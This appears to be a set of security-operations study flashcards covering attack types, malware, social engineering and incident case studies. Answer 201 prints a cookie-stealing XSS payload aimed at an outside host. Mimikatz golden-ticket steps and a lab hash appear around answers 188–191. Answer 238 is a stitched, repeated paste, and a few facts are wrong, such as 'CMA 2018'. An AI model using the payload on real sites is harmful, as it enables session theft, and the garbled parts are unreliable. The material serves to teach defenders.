follow CYBER KILL CHAIN

Answer 162

**Reconnaissance**: Gathering information about the target. **Weaponisation**: Creating a malicious payload. **Delivery**: Sending the payload to the target. **Exploitation**: Activating the payload to exploit a vulnerability. **Installation**: Installing malware to maintain access. **Command and control (C2)**: Establishing remote control over the compromised system. **Actions on objectives**: Achieving the attacker’s goal, such as data theft or disruption.

Answer 163

after tests compile detailed report outlining vulnerabilities, methods used to exploit and reccs for remediation involves non-technical stakeholders

Answer 164

Those that move black to white or white to black are known as grey hat. A grey hat is a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but usually does not have the malicious intent typical of a black hat hacker.

Answer 165

Ethical hackers are known as white hats and malicious hackers as black hats

Answer 166

Pentesting can be performed on applications, systems and services. This includes physical security using social engineering to gain access into a building and the target areas the organisation has requested to be tested.

Answer 167

*AI will contribute *Try Hack Me or Hack the Box *entry level: CompTIA Pentest+ or EC Council Certified Ethical Hacker (CEH), *higher:CREST Registered Penetration Tester

Answer 168

The prerequisite to sit that exam is having the CREST Practitioner Security Analyst certification. Another is Offensive Security’s Offensive Security Certified Professional (OCSP), which is a 24-hour practical exam gaining access to machines (rooting) and writing a pentest report on your findings. Each machine you manage to root you score points and to pass you must score sufficient points, which is 70 out of a maximum of 100 points.

Answer 169

is used to test an organisation’s defence by simulating real-world attacks to identify vulnerabilities/weaknesses group of highly skilled ethical hackers attempts to breach security controls

Answer 170

Typically have a broad scope can include any aspect of the organisation’s security, from network and system security to physical security and human factors, such as social engineering aim to mimic TTPs of real attackers including APTs nation-state actors, cybercriminals or insider threats

Answer 171

variety e.g phishing, social engineering, physical breaches, malware deployment and exploiting software vulnerabilities CREATIVE/ADAPTIVE

Answer 172

During these exercises, the ‘blue team’, responsible for defending the organisation, works to detect, respond to and mitigate the attacks simulated by the red team. sometimes aware/unaware to covertly/ truly test the blue team’s detection and response capabilities

Answer 173

provides a detailed report on their findings, including how they were able to breach defences, what vulnerabilities were exploited and recommendations for improvement. assess blue team performance highlight areas for enhancement in detection and response part of continuous improvement, regular exercises ahead of evolving threats/ improve over time

Answer 174

finds hidden attack vectors that could be exploited especially from APTs; demonstrates how an attacker could pivot through a network and system; tests the cyber defence team to prevent, detect and respond; helps support an organisation case for security improvements; identifies holistic impact of an attack on people, process and technology.

Answer 175

exploit: 38 per cent; phishing: 17 per cent; earlier breaches: 15 per cent; compromised credentials: 10 per cent; brute force: 6 per cent.

Answer 176

**evolving phishing trends**, such as attacker use of social media, SMS and other communications technologies; **tactics to bypass MFA**, such as adversary-in-the-middle and other techniques; **cloud intrusion trends**, such as targeting of cloud infrastructure as well as attacker use of cloud resources; **use of AI in red and purple team engagements**, with a focus on how new technologies can help produce better outcomes for organisations.

Answer 177

a targeted attack that floods a network with false requests or protocols in order to disrupt organisation operations. during: organisation/systems unable to function, no-availability most no loss of data/ransom BUT cost organisation TIME/RESOURCES to restore critical organisation operations

Answer 178

DoS attacks are from just one system, while DDoS attacks are launched from multiple systems, which could be a botnet of globally comprised computers or attackers opting into a DDoS network. DDoS faster/harder to block as potentially global spread

Answer 179

Spoofing is a technique through which an attacker disguises themselves as a known or trusted source. pretends to be legit user goal = steal information persistence: install custom malware to extract data over time DOMAIN and EMAIL spoofing

Answer 180

makes use of **forged sender addresses** to send messages to a recipient who will trust the email. They are then much more likely to open the email including attachments, leading to malware infection including ransomware and spyware. There may be malicious links that the recipient believes is a payment portal to pay an invoice.

Answer 181

is where an attacker impersonates a legitimate organisation with a fake website or email domain, and is a form of phishing. As the domain appears to be legitimate at first glance, it can fool people into trusting and using it.

Answer 182

Crowdstrike: 80% of breaches, up to 250 days to identify HARD TO DETECT legit user or? How to detect compromised account? user behaviour analytics collect/analyse user activity data for baseline of normal behaviour patterns and preferences

Answer 183

is a *post-exploitation attack* which attempts to crack the password of an active directory service account. The attacker masquerades as an account user. (Kerberos is a network authentication protocol used in Microsoft Windows that uses tickets to securely authenticate users and services.)

Answer 184

(an attack that’s carried out on a system that’s already been compromised)

Answer 185

is an attack using eavesdropping on a conversation between two systems. The goal is to try and collect passwords and banking details or force the user to change credentials or complete a funds transfer.

Answer 186

A pass-the-hash attack is where an attacker steals hashed user credentials (as soon as a password is typed into a system, it is hashed). The user credential is then used to create a new user session. Using a hash means it does not have to be cracked or the attacker to know what the password is. They are simply using a stored password to gain access.

Answer 187

In credential harvesting an attacker gathers credentials such as passwords, email addresses and user IDs in large quantities to then gain access or sell them on the dark web.

Answer 188

The example in Figures 4.7–4.9 shows the use of a tool called Mimikatz to create a golden ticket that gives an attacker access to all machines on the domain.

Answer 189

This dumps the hash and security identifier of the Kerberos ticket granting ticket (allows access to system and resources the user has been granted access to) allowing the creation of a golden ticket. The password hash is under primary and the ‘Kerberos’ user is New Technology LAN Manager (NTLM) format (Windows password); the hash is 5508500012cc005cf7082a9a89ebdfdf.

Answer 190

The golden ticket that has been created now allows access to any machines on the same domain

Answer 191

All the above was undertaken in a lab environment on a vulnerable Windows server

Answer 192

Mimikatz should be picked up by anti-malware and other detection systems quite easily, if configured correctly. I have been involved in an incident where Mimikatz was installed by an attacker on servers being decommissioned and no longer in production, but still connected to the internet and network. Mandiant and anti-virus picked up the software being installed, and blocked, removed and alerted the intrusion.

Answer 193

Credential stuffing works because users often use the same ID (email address) and password across multiple accounts. Having credentials for one account may be able to grant access to other, unrelated accounts.

Answer 194

Password spraying sees an attacker using a common password across multiple accounts on the same application. This is to avoid account lockouts that would occur with a brute force attack trying different passwords.

Answer 195

Brute force attack is essentially trial and error attacks where a list of passwords or usernames is fired at a system until the correct one is guessed.

Answer 196

A downgrade attack is where an attacker makes use of backwards compatibility to force a system to use a less secure encryption cipher or less secure method to gain access.

Answer 197

Code injection attacks are where an attacker injects malicious code into a vulnerable system or application to gain access and/or change its response. Some types of code injection attacks are...

Answer 198

Kerberoasting Golden Ticket Attack Adversary-in-the-Middle (AITM) Pass-the-Hash Credential Harvesting Credential Stuffing Password Spraying Brute Force Attack Downgrade Attack

Answer 199

SQL Injection Cross-Site Scripting (XSS) Malvertising Data Poisoning (AI Poisoning)

Answer 200

SQL injection makes use of insecure SQL coding or vulnerabilities to gain access into an SQL database. This could be to extract, change or delete data stored in the database.

Answer 201

XSS often uses languages such as JavaScript or PHP to inject code, often through insecure input boxes on a website. Here is a simple example of JavaScript code that can be injected into a vulnerable website and write to a cookie to redirect to another website, in this case bcs.org: window.location='bcs.org/?cookie='+document.cookie The code can be used to infect either browser or server side, such as causing a user to be sent to fake web pages, steal cookies or steal user and sensitive information. Web forums, message boards, blogs and other insecure websites that allow users to post their own content are the most susceptible to XSS attacks.

Answer 202

Malvertising makes use of several techniques to carry out attacks. One is search engine optimisation poisoning by breaching a third-party server so the attacker can inject malicious code with a banner or advert which, once clicked, causes malware to be installed on the user’s computer.

Answer 203

Data poisoning, also called AI poisoning, is where an attacker compromises a training data set used by AI or ML to manipulate operation of that model. As it is poisoned in the training phase, they can leave biases and erratic outputs, introduce vulnerabilities or influence predictive capabilities.

Answer 204

Domain name system (DNS) tunnelling type of attack uses DNS queries required to resolve domain names to IP addresses attacker can use DNS queries to transmit data,uch as command and control, inject malware and send or revive data simple to deploy= rise in attacks SolarWinds attack 2020

Answer 205

Attack The employee decided to install a hardware key-logger onto the head of HR’s laptop so they could see any emails or information being sent about them to derail the investigation. This proved successful for several months, with HR and management confused as to how the employee knew what was being said and undertaken in the investigation. Response The head of HR’s laptop required an update, and a member of IT came in to physically undertake the update. When checking the laptop, they noticed a suspicious USB device plugged into the back. They removed the device and spoke to their team, who identified it as a key-logger. They also brought in an external digital forensics company to identify where the data was being sent to. Impact This was an internal threat that was left to be undiscovered for several months. While it did not directly impact the organisation financially, it could have caused reputational damage had information got out about what had occurred. Rather than have a criminal investigation and the publicity that may cause the organisation, they sacked the employee under gross misconduct. The employee was told that if they caused a fuss then the organisation would look towards a criminal investigation under the CMA 2018. Lesson learnt Devices should be physically examined either by the user or IT to ensure no rogue devices have been connected. Keyloggers can be hard to detect, but there are monitoring systems and the use of banning any USB device being connected both through the OS and policy. HR had suspicions and these should have been followed up by reporting to IT.

Answer 206

staying away from ‘too much security’, which can lead to undesired user behaviour – especially with systems that are too complex to use or have frequent password changes and complexity requirements.

Answer 207

* only change on breach vs 30/60/90 days *password stolen=used quickly *length >complex *password reuse vs memorable *MFA where possible!

Answer 208

Something you know/have/are

Answer 209

Something you are: Biometrics: Unique biological characteristics such as fingerprints, facial recognition, iris scans or voice recognition.

Answer 210

Something you have: Mobile phone: Used for receiving OTPs via SMS, email or authentication apps. Hardware token: A physical device that generates a time-based or event-based OTP. Smart card: A card with an embedded integrated circuit used for authentication.

Answer 211

Something you know: Password: A secret word or phrase known only to the user. PIN: A numeric code that is used to authenticate the user.

Answer 212

Password; 111111111; 123456789; Guest; 1234567; Password1; abc123; qwerty; a1b2c3; qwerty123.

Answer 213

The top hacked passwords often contain themes such as: pet names; first names; animals; emotions; food.

Answer 214

employees already working for the organisation and with access to the building or systems, or it could be former employees who still have access, and they both can pose a high risk of data exfiltration, data corruption, theft of IP. have knowledge of policy/procedures financial gain/disgruntled/spy

Answer 215

not malicious

Answer 216

Negligence: Can be classed as gross misconduct if it causes major financial loss. Insider Threat Mitigation: Use Data Loss Prevention (DLP) tools Implement monitoring systems Ensure robust offboarding and account access revocation Conduct auditing of access and activity Provide security awareness training Promote a security-first culture

Answer 217

malicious software can result in data lost/system damage beyond repair

Answer 218

An unauthorised piece of code that installs and runs itself on a computer without the knowledge or permission of the owner. It then conducts data processing and other operations that benefit the originator, usually at the expense of the system users or the recipient of the output from the malware.

Answer 219

Viruses Worms Ransomware Rootkits Backdoors Spyware Trojans Logic Bomb Infostealer

Answer 220

A virus cannot spread on its own. requires a host = attached to another piece of data or a program to reach and infect another computer. Viruses run by the user interacting with them through opening a file, such as an attachment on an email, or through removable media, websites, malicious driver downloads, infected games, movies or music.

Answer 221

PROPOGATES through the network and **does not require a host.** seek out other computers on any networks they can find, and can spread very quickly. By 2009, 7 million computers Confiker worm, which targeted Microsoft Windows® systems using a flaw in the OS.

Answer 222

Type of software, infects a computer via a virus or worm encrypting the data so it cannot be accessed and asks for a ransom to decrypt it. To gain access to your data (most do not) often in bitcoin. HIGHLY EFFECTIVE LIST OF PAYERS TARGETED MORE OFTEN NEVER REGAIN/CORRUPTED ransomware resilient and tested backups in place. One of the most visible of this type of attack was the so-called ‘WannaCry’ worm attack, which took place in 2017, affecting computers running Microsoft.

Answer 223

These are complex software packages that hijack the operating system at its lowest level, called the kernel. They can be hard to detect and anyone who has rooted a phone or unlocked a firestick has essentially used a rootkit to bypass security controls. They are insidious in that they still perform all tasks that the user requests, but they often make copies of sensitive data such as passwords, account details and logins and then send them to another computer, often to enable financial fraud such as identity theft.

Answer 224

It was customary practice in software and some systems to allow third-party access or maintenance access. a malicious actor could gain remote access to a system to exfiltrate data or turn into a ‘bot’, short for robot, to distribute spam, perform bitcoin mining (crypto jacking) or be part of a DDoS network.

Answer 225

E.G. malevolent cookies by websites. Some are designed to be permanent and to track and report the web usage back to a third party without the knowledge of the user. can also log keystrokes and look for specific information such as bank account or ecommerce site login credentials. These can also be installed by software that performs a legitimate service, and freeware or bogus prizes are often offered as a means of getting a user to install spyware

Answer 226

These are malicious software disguised as something legitimate, such as a game or utility software. The malicious software is created and then a wrapper is put around it to hide it – much like a shiny sweet wrapper around an awful-tasting sweet. At one point, the Google Play store had quite a few Trojan programs, such as games which, while being played, sent out premium rate texts at US$5 a text

Answer 227

A logic bomb is a type of malware that has been designed to activate on a set date or an event. It is a malicious piece of code that has been covertly inserted into a network, OS or software application. An example is when David Tinley, who was a contractor with Siemens, provided software to one of Siemens’s offices. He had worked at Siemens for nearly a decade, providing spreadsheet software to manage equipment. At some point he had planted a logic bomb in one of the spreadsheets.

Answer 228

Information-stealing malware is a type of malicious software designed to covertly gather and exfiltrate sensitive information from infected systems. This can include login credentials, financial data, personal identification information and other valuable data. Infostealers often operate by capturing keystrokes, taking screenshots or extracting stored data from browsers and applications. Once the information is collected, it is typically sent back to the attacker, who can use it for identity theft, financial fraud or selling the data on the dark web. This type of malware can be distributed through phishing emails, malicious websites or as part of a larger malware package. COVERT UNDETECTED LONG PERIODS USES SOCIAL ENGINEERING E.G. PHISHING TO DOWNLOAD often part of a large scale

Answer 229

Infostealer is often effective due to its design. The malware has been designed to operate covertly, often bypassing anti-virus and other security controls, allowing it to remain undetected for long periods while collecting valuable data without alerting the user. It uses social engineering tactics, such as phishing emails, fake software updates or malicious websites, to trick users into downloading and executing the malware, and employs advanced methods to capture and exfiltrate the data.

Answer 230

main way in which malware is prevented from infecting a computer. Anti-virus software runs in the background on a device. It checks every file that is opened for malware. It can be known as on-access scanning, background scanning, resident scanning or real-time protection. The basic type of anti-virus makes use of signatures. A virus signature is a continuous sequence of bytes that is common for a certain malware sample. To try and prevent detection of malware, developers try to obfuscate, using a variety of techniques. The database use by anti-virus still contains signatures (they account for more than half of all database entries), but also includes more sophisticated entries as well. Anti-virus programs also use heuristic analysis, which checks a program for bad behaviour that may indicate a new or unknown virus.

Answer 231

Anti virus

Answer 232

Antivirus is one part of it EDR as ‘records and stores endpoint-system-level behaviors, uses various data analytics techniques to detect suspicious system behaviour, provides contextual information, blocks malicious activity, and provides remediation suggestions to restore affected systems’ (SecureOps 2022).

Answer 233

offer advanced threat detection, investigation and response capabilities. This includes the ability to conduct investigations, triage , suspicious activity validation, threat hunting, and malicious activity detection and containment

Answer 234

XDR is a more advanced approach than EDR, and integrates and correlates data across multiple security layers, including endpoints, networks, servers and email. By unifying these sources, XDR provides a holistic view of threats, enabling more efficient and accurate detection, investigation and response to security incidents. Having visibility helps security teams quickly identify and mitigate sophisticated threats that might otherwise go unnoticed by isolated security tools. XDR makes use of automation and advanced analytics to streamline threat detection and response workflows to reduce the time and effort

Answer 235

ATTACK The attackers were able to install a key-logger that was able to capture banking credentials. They could then access the organisation’s banking and other financial services using a legitimate ID and password. Response The bank was only able to retrieve £200,000 of the stolen money, leaving the organisation with a loss of £350,000 and £200,000 in overdraft. As the organisation did not have a response plan in place, this further delayed the investigation, and they brought in a third party to undertake a security review of their systems, identify the source and ensure systems were upgraded to prevent it happening again. Impact The organisation had to shut down their bank account and take legal action to recover the remaining £350,000, but had to pay for the security consultancy, legal costs and time spent internally. This ended up costing around £150,000. Lessons learnt Have notifications in place for ALL transactions, especially new ones to unknown bank accounts or credit cards. Restrict access to sensitive accounts, ensuring only those requiring access have access. Put in place MFA and possibly privilege access management (PAM), depending on size and scale of the organisation and transactions. Ensure security is evaluated and is part of the organisation evaluating the risk and cyber liability insurance options. Ensure banking is undertaken with multiple layers of authentication to access accounts and transactions. Have an IR plan in place, even in a small organisation. Ensure employees are aware of phishing attacks and general security awareness through training. Have adequate anti-virus and monitoring in place to prevent malware infection and phishing emails getting through to the user

Answer 236

Used to manipulate sharing information such as passwords and credit card details, downloading malicious software that can spy or steal credentials and data, tricking users into visiting fake websites selling cheap or non-existent goods, sending money to criminals pretending to be someone else or posting something on social media that gives away data that can be used.

Answer 237

More often data is encrypted, so harder to steal AITM type attacks where traffic is intercepted, sniffed or redirected to a malicious system

Answer 238

phishing , the most common being the use of phishing emails. These are only about 3 per cent effective. A more targeted spear-phishing email of a high quality used to target actual users can be up to 80 per cent effective. The last one is whaling, which targets the ‘big fish’; in other words, senior management or the boss of a company. Whaling has always made me smile, as a whale is a mammal not a fish! Other types of social engineering include vishing, which is accounts and transactions. Have an IR plan in place, even in a small organisation. Ensure employees are aware of phishing attacks and general security awareness through training. Have adequate anti-virus and monitoring in place to prevent malware infection and phishing emails getting through to the user. SOCIAL ENGINEERING Social engineering is used to manipulate people into sharing information such as passwords and credit card details, downloading malicious software that can spy or steal credentials and data, tricking users into visiting fake websites selling cheap or non-existent goods, sending money to criminals pretending to be someone else or posting something on social media that gives away data that can be used. As security around computers has improved, and data flowing around networks and the internet is often encrypted, it is no longer as easy to steal data through AITM type attacks where traffic is intercepted, sniffed or redirected to a malicious system. Social engineering makes use of numerous mediums, the most common being the use of phishing emails. These are only about 3 per cent effective. A more targeted spear-phishing email of a high quality used to target actual users can be up to 80 per cent effective. The last one is whaling, which targets the ‘big fish’; in other words, senior management or the boss of a company. Whaling has always made me smile, as a whale is a mammal not a fish! Other types of social engineering include vishing, which is voice solicitation where you receive a phone call and they then try to get you to give away account information, credentials and personal data. Another type is smishing, which is using fake text messages from your bank, tax office, children or someone in authority to elicit fear and get you to click on a link

Answer 239

engineering focuses on manipulating us, often using our ‘fight or flight’ syndrome by eliciting some form of fear so that we will react out of concern and click on a link or open a document without thinking. A part of the brain called the amygdala processes emotional stimuli and can kick in a ‘fight or flight’ response before our rational brain kicks in. This can lead us to react and click on that link or give away personal data. The key remediation for this is to never react straight away. Take a pause and have a think before you respond, so you use the rational side of your brain.

Answer 240

Techniques used by social engineers are often linked to authority; intimidation; consensus; scarcity; urgency; familiarity; trust; greed. lack of awareness so education important

Answer 241

Dumpster diving is another technique, where an individual will go through the bins of an organisation or individual looking for anything with personal information on it, and can lead to identity theft SOCIAL ENGINEERING

Answer 242

Physical social engineering can see someone pretending to be an engineer, or maybe a new starter who cannot gain access to the building, and then socially engineer their way into the building. This technique can also be used as part of a physical penetration test, to see if unknown people are challenged and the correct procedure is followed around visitors to the organisation

Answer 243

now being used to aid in social engineering campaigns with WormGPT and FraudGPT. These malicious AI have stripped away any kind of safety protections or ethical barriers put in place by Microsoft, Google or Open AI. Developers of WormGPT claim it offers an unlimited character count and code formatting. The use of AI makes it easy for novices to create realistic phishing emails that have been effective. AI will see greater use in the longer term to counter the growing threat too.

Answer 244

ATTACK phishing attack occurred when the senior manager thought a link in an email requiring a software update was legitimate. Response The organisation’s IT management immediately shut off communications to the affected server and took the system offline to run scans of the network and identify any additional breaches and IoCs. The organisation had its own small internal digital forensics and IR team, who took over the investigation. Impact The operational and financial impact from the breach was extensive – costing more than £1 million. The company was offline for several days, disrupting the organisation while new security software licences and a new server were deployed. Lessons learnt Senior management are often targeted with phishing emails, and these may arrive directly or via their personal assistant so both need to be given suitable security awareness training and advice with a focus on attacks that target senior management and organisation owners. Anti-virus should be updated and suitable EDR in place across all endpoint devices and servers. Ongoing vulnerability management and scanning should be in place to ensure critical vulnerabilities are acted on in a timely fashion, with a process to evaluate the vulnerability and its impact and test and deploy required patches.

4 SECURITY OPERATIONS Flashcards

(280 cards)